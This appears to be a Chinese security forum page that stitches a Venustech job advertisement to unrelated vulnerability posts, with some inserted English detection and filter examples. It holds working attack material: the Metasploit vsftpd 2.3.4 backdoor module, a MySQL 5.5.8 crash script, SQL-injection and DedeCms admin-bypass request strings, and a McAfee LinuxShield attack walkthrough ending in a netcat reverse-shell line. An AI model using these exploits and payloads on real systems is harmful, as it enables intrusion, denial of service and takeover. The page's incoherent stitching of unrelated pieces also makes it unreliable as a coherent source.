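[Recruitment] [Hiring] Venustech (启明星辰) R&D recruitment

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2 years or more
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • Online QQ:
  • Security assistant: recruit or look for a job through the 非安全中国 administrators, QQ group: 57116771


  • ++++++++++ Notes on Venustech ++++++++++

    Just send me a message on the site.

    I. R&D Center: Linux C software engineer (several openings)

    Responsibilities:

    1. Development and maintenance of software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming

    2. Skilled with the Linux operating system; proficient in C programming on Linux

    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis

    4. Familiar with network security protocols and with devices such as routers, switches and firewalls

    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test engineer (several openings)

    Responsibilities:

    1. System testing and integration testing of products

    2. Writing, executing and revising product test cases

    3. Product performance testing

    4. Support and testing for external projects

    Requirements:

    1. Basic knowledge of TCP/IP

    2. Solid data-communications fundamentals

    3. Some Linux background

    4. Able to set up and use databases

    5. Familiar with at least one programming language: C/Perl/VBS/TCL

    6. Familiar with test case design, system testing and stress testing

    7. Familiar with firewall principles, with some understanding of firewall features

    8. Some understanding of how network security devices are deployed in a network

    9. Able to use test tools: Loadrunner, packet analysis software, Spirent or IXIA testers

    III. R&D Center: Security event engineer (several openings)

    Responsibilities:

    1. Delivering Trojan detection services and web vulnerability scanning services

    2. Technical support for service customers

    3. Research on web-page Trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and similar

    4. Routine upgrade and maintenance of the security event libraries of IDS/IPS/UTM/TDS/WAG/322 and other products

    5. Research on attack techniques; research on the TCP/IP protocols; research on reverse engineering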

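    非安全中国网 disclaimer: 1. All statements and images in this post are solely the poster's personal opinion and do not represent the position of this site;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules of the "Copyright and Disclaimer Statement" and enjoys the related rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Part of this post is reposted from other media and published on this site in order to pass on more information; this does not mean the site agrees with its views or takes responsibility for its accuracy;
    5. If this post infringes the copyright of your site or of you personally, please notify this site immediately; the site will delete it promptly and offers its sincere apologies;
    6. The site's administrators and moderators have the right to delete this post without notifying the poster in advance.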

    VSFTPD v2.3.4 Backdoor command execution vulnerability

    ##
    # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
          'Description'    => %q{
              This module exploits a malicious backdoor that was added to the VSFTPD download
              archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
              June 30th 2011 and July 1st 2011 according to the most recent information
              available. This backdoor was removed on July 3rd 2011.
          },
          'Author'         => [ 'hdm', 'mc' ],
          'License'        => MSF_LICENSE,
          'Version'        => '$Revision: 13099 $',
          'References'     =>
            [
              [ 'URL', 'http://pastebin.com/AetT9sS5'],
              [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
            ],
          'Privileged'     => true,
          'Platform'       => [ 'unix' ],
          'Arch'           => ARCH_CMD,
          'Payload'        =>
            {
              'Space'       => 2000,
              'BadChars'    => '',
              'DisableNops' => true,
              'Compat'      =>
                {
                  'PayloadType'    => 'cmd_interact',
                  'ConnectionType' => 'find'
                }
            },
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jul 3 2011',
          'DefaultTarget'  => 0))

        register_options([ Opt::RPORT(21) ], self.class)
      end

      def exploit

        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_status("The port used by the backdoor bind listener is already open")
          handle_backdoor(nsock)
          return
        end

        # Connect to the FTP service port first
        connect

        banner = sock.get_once(-1, 30).to_s
        print_status("Banner: #{banner.strip}")

        sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
        resp = sock.get_once(-1, 30).to_s
        print_status("USER: #{resp.strip}")

        if resp =~ /^530 /
          print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
          disconnect
          return
        end

        if resp !~ /^331 /
          print_error("This server did not respond as expected: #{resp.strip}")
          disconnect
          return
        end

        sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

        # Do not bother reading the response from password, just try the backdoor
        nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
        if nsock
          print_good("Backdoor service has been spawned, handling...")
          handle_backdoor(nsock)
          return
        end

        disconnect

      end

      def handle_backdoor(s)

        s.put("id\n")

        r = s.get_once(-1, 5).to_s
        if r !~ /uid=/
          print_error("The service on port 6200 does not appear to be a shell")
          disconnect(s)
          return
        end

        print_good("UID: #{r.strip}")

        s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
        handler(s)
      end

    end
    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.

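    A detection-side view of the module above, as an added example that is not part of the original post or of Metasploit: it flags FTP logins whose user name contains the `:)` trigger and raises the severity when the same client then reaches port 6200. The log lines are constructed, the FTP line layout is assumed to be vsftpd's protocol log, and the connection-log format and the 60-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

BACKDOOR_PORT = 6200             # bind-shell port the module connects to
WINDOW = timedelta(seconds=60)   # assumption: correlation window for the example

# Assumed vsftpd protocol-log layout (log_ftp_protocol=YES)
FTP_LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'FTP command: Client "(?P<client>[^"]+)", "USER (?P<user>[^"]*)"$')
# Hypothetical firewall/connection log layout
CONN_LINE = re.compile(
    r'^(?P<ts>\S+) ACCEPT src=(?P<src>\S+) dst=\S+ dport=(?P<dport>\d+)$')

# Constructed sample data (documentation address ranges)
FTP_LOG = [
    'Wed Jul 13 10:14:40 2011 [pid 3101] FTP command: Client "198.51.100.23", "USER anonymous"',
    'Wed Jul 13 10:15:02 2011 [pid 3105] FTP command: Client "203.0.113.7", "USER q7Zk:)"',
    'Wed Jul 13 10:15:02 2011 [pid 3105] FTP command: Client "203.0.113.7", "PASS <password>"',
    'Wed Jul 13 11:02:10 2011 [pid 3140] FTP command: Client "198.51.100.80", "USER bob:)"',
]
CONN_LOG = [
    '2011-07-13T10:15:03 ACCEPT src=203.0.113.7 dst=192.0.2.10 dport=6200',
    '2011-07-13T10:20:00 ACCEPT src=198.51.100.23 dst=192.0.2.10 dport=21',
]


def smiley_logins(ftp_lines):
    """Return (time, client, user) for every USER command containing ':)'."""
    hits = []
    for line in ftp_lines:
        m = FTP_LINE.match(line.strip())
        if m and ":)" in m.group("user"):
            ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
            hits.append((ts, m.group("client"), m.group("user")))
    return hits


def correlate(ftp_lines, conn_lines, window=WINDOW):
    """One finding per trigger login; 'high' when the same client connected
    to the backdoor port within the window after the login, else 'medium'."""
    backdoor_conns = []
    for line in conn_lines:
        m = CONN_LINE.match(line.strip())
        if m and int(m.group("dport")) == BACKDOOR_PORT:
            backdoor_conns.append((datetime.fromisoformat(m.group("ts")),
                                   m.group("src")))
    findings = []
    for ts, client, user in smiley_logins(ftp_lines):
        followed = any(src == client and timedelta(0) <= cts - ts <= window
                       for cts, src in backdoor_conns)
        findings.append({"client": client, "user": user,
                         "severity": "high" if followed else "medium"})
    return findings


if __name__ == "__main__":
    for finding in correlate(FTP_LOG, CONN_LOG):
        print(finding)
```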

    WordPress Event List Plugin <= 0.7.8 - SQL injection vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 remote denial-of-service vulnerability

    import socket, sys

    print "\n"
    print "----------------------------------------------------------------"
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"
    print "| Level Smash the Stack                                         |"
    print "----------------------------------------------------------------"
    print "\n"

    buf=("&x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")

    buf2=("x11x00x00x00x03set autocommit30")

    def usage():
        print "usage : ./mysql.py <victim_ip>"
        print "example: ./mysql.py 192.168.1.22"

    def main():
        if len(sys.argv) != 2:
            usage()
            sys.exit()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        HOST = sys.argv[1]
        PORT = int(3306)
        s.connect((HOST,PORT))
        print "\n[*] Connect"
        s.send(buf)
        print "\n[*] Payload 1 sent"
        s.send(buf2)
        print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
        s.close()

    if __name__ == "__main__":
        main()

    Step-by-step Linux installation: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 unauthorized access vulnerability
    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current verification code and you go straight into the site's admin back end.

    The precondition for this vulnerability is that the admin path must be known.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
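    Why the replacement filter in the post above catches the request while the original loop does not, as an added example that is not part of the original post or of DedeCms: a Python model of the two PHP checks run over constructed query strings. The function names, the simplified bracket parser and the sample host `db.example.invalid` are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl

# Same pattern as preg_match('#^(cfg_|GLOBALS)#', ...) in the post
BLOCKED = re.compile(r"^(cfg_|GLOBALS)")


def php_style_request(query):
    """Simplified model of how PHP turns a[b][c]=v into nested arrays."""
    request = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        head, brackets = re.match(r"([^\[]*)(.*)", name).groups()
        keys = [head] + re.findall(r"\[([^\]]*)\]", brackets)
        node = request
        for key in keys[:-1]:
            if not isinstance(node.get(key), dict):
                node[key] = {}
            node = node[key]
        node[keys[-1]] = value
    return request


def old_filter_allows(request):
    """The loop being replaced: only the top-level names are tested."""
    return not any(len(k) > 0 and BLOCKED.match(k) for k in request)


def new_filter_allows(val):
    """Model of CheckRequest(): every key and every leaf value, at any depth."""
    if isinstance(val, dict):
        return all(new_filter_allows(k) and new_filter_allows(v)
                   for k, v in val.items())
    return not (len(val) > 0 and BLOCKED.match(val))


def verdicts(query):
    """(allowed by old loop, allowed by CheckRequest) for one query string."""
    request = php_style_request(query)
    return old_filter_allows(request), new_filter_allows(request)


# Constructed queries in the shape of the request shown in the post
NESTED = "dopost=login&userid=admin&_POST[GLOBALS][cfg_dbhost]=db.example.invalid"
DIRECT = "cfg_dbhost=db.example.invalid"
BENIGN = "dopost=login&userid=admin"
VALUE_ONLY = "keyword=cfg_basehost"   # blocked prefix appears only in a value

if __name__ == "__main__":
    for label, q in [("nested", NESTED), ("direct", DIRECT),
                     ("benign", BENIGN), ("value only", VALUE_ONLY)]:
        print(label, verdicts(q))
```

    The top-level name of the nested parameter is `_POST`, which the old pattern never sees as `GLOBALS` or `cfg_`; the recursive version also rejects values that merely start with a blocked prefix, which is stricter than the original loop.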

    Step-by-step Linux installation: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf


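    Multiple security vulnerabilities in the Django development framework
    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks or carry out denial-of-service attacks.
    1) An error in session handling in django.contrib.sessions when a cache backend is used can be exploited to manipulate session information. Successful exploitation requires that the session key is known and that the application allows the attacker to store dictionary-like objects in the cache under a valid session key.
    2) The Django model system includes a field type, URLField, which validates that the supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it attempts to check the supplied URL and resolve it. By default the underlying socket has no timeout set, so an attacker can exploit this by sending crafted URLs that consume all server memory, causing a denial of service.
    3) An error in handling redirect responses when verifying URLs supplied to the "URLField" field type lets an attacker have a redirect response point to a "file://" URL, which makes it possible to determine whether local files exist on the server.
    4) An error in handling the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses can be exploited for cache poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/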
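    Item 4 of the advisory above, worked through as an added example that is not part of the original post and is not Django's code: a toy application builds a redirect from the request headers behind a cache keyed by path only, first trusting "X-Forwarded-Host" blindly and then with an allowlist check. All names, hosts and the cache model are assumptions constructed for the illustration.

```python
ALLOWED_HOSTS = {"www.example.test"}   # constructed allowlist for the example


class DisallowedHost(Exception):
    """Raised when the effective host is not on the allowlist."""


def naive_host(headers):
    """Pattern described in item 4: the forwarded header always wins."""
    return headers.get("X-Forwarded-Host") or headers.get("Host", "")


def checked_host(headers, allowed=ALLOWED_HOSTS, behind_trusted_proxy=False):
    """Read X-Forwarded-Host only when a trusted proxy sets it, and accept
    the resulting host only if it is on the allowlist."""
    forwarded = headers.get("X-Forwarded-Host") if behind_trusted_proxy else None
    host = (forwarded or headers.get("Host", "")).strip().lower()
    if host not in allowed:
        raise DisallowedHost(host)
    return host


def redirect_to_slash(path, host):
    """Full-URL redirect of the kind a framework emits for a missing slash."""
    return {"status": 301, "Location": "http://%s%s/" % (host, path)}


def naive_app(path, headers):
    return redirect_to_slash(path, naive_host(headers))


def hardened_app(path, headers):
    try:
        return redirect_to_slash(path, checked_host(headers))
    except DisallowedHost:
        return {"status": 400}


class PathKeyedCache:
    """Toy shared cache that keys on the path and ignores request headers."""

    def __init__(self, app):
        self.app, self.store = app, {}

    def get(self, path, headers):
        if path not in self.store:
            response = self.app(path, headers)
            if response["status"] >= 400:
                return response          # errors are not cached
            self.store[path] = response
        return self.store[path]


def location_seen_by_next_visitor(app):
    """Send one request with a forged header, then an ordinary one."""
    cache = PathKeyedCache(app)
    cache.get("/accounts", {"Host": "www.example.test",
                            "X-Forwarded-Host": "attacker.example.test"})
    return cache.get("/accounts", {"Host": "www.example.test"})["Location"]


if __name__ == "__main__":
    print("naive:   ", location_seen_by_next_visitor(naive_app))
    print("hardened:", location_seen_by_next_visitor(hardened_app))
```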

    McAfee LinuxShield local/remote code execution vulnerability
    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote exploitation: Yes
    Local exploitation: Yes
    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack
    Windows-based systems do not directly attack Linux systems, a Linux
    server can harbor these viruses, ready to infect any client that
    connects to it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

    walk-through (after the TLS handshake):
    +--------------------------------------

    nailsd > +OK welcome to the NAILS Statistics Service
    attacker> auth <user> <pass>
    nailsd > +OK successful authentication

    # Set the Attacker repository to download our code from a httpd
    # (catalog.z)
    #---------------------------------------------------------------
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    ="1.0" encoding="UTF-8"?><ns:SiteLists
    xmlns:ns="naSiteLi
    st" GlobalVersion="20030131003110"
    LocalVersion="20091209
    161903" Type="Client"><SiteList
    Default="1" Name="SomeGU
    ID"><HttpSite Type="repository"
    Name="EvilRepo" Order="1
    " Server="<attackerhost>:80"
    Enabled="1" Local="1"><Rela
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use
    rName></
    UserName><Password
    Encrypted="0"/></HttpSite></SiteList></
    ns:SiteLists> _cmd=update
    nailsd > +OK database changes buffered.

    # Execute task to set the attacker repository
    #---------------------------------------------------------------
    attacker> task setsitelist
    nailsd > +OK setting sitelist from CMA.

    # Execute the default Update task to download the code
    #---------------------------------------------------------------
    attacker> task nstart LinuxShield Update
    nailsd > +OK task LinuxShield Update starting

    # Create a Scan profile, which executes our code. The profiles are
    # not stored in the database.
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
    #---------------------------------------------------------------
    attacker> sconf ODS_99 begin
    nailsd > +OK 1260400888

    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
    # where our earlier downloaded catalog.z file is stored.
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    #---------------------------------------------------------------
    attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    ss nailsd.profile.ODS_99.action.error=Block
    nailsd > +OK configuration changes buffered
    attacker> sconf ODS_99 commit 1260400888
    nailsd > +OK configuration changes stored

    # Set a scan task with the manipulated profile to execute the code
    #---------------------------------------------------------------
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    mp;exclude:false timetable=type=unscheduled taskResults=
    _lastRun=1260318482 status=Stopped _cmd=insert
    nailsd > +OK database changes buffered

    # Execute scan task to execute the code
    #---------------------------------------------------------------
    attacker> task nstart Evil Task

    +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

    --- snip ---
    #!/bin/sh
    nc -nv <attacker_host> 4444 -e /bin/sh
    --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
    2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
    the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory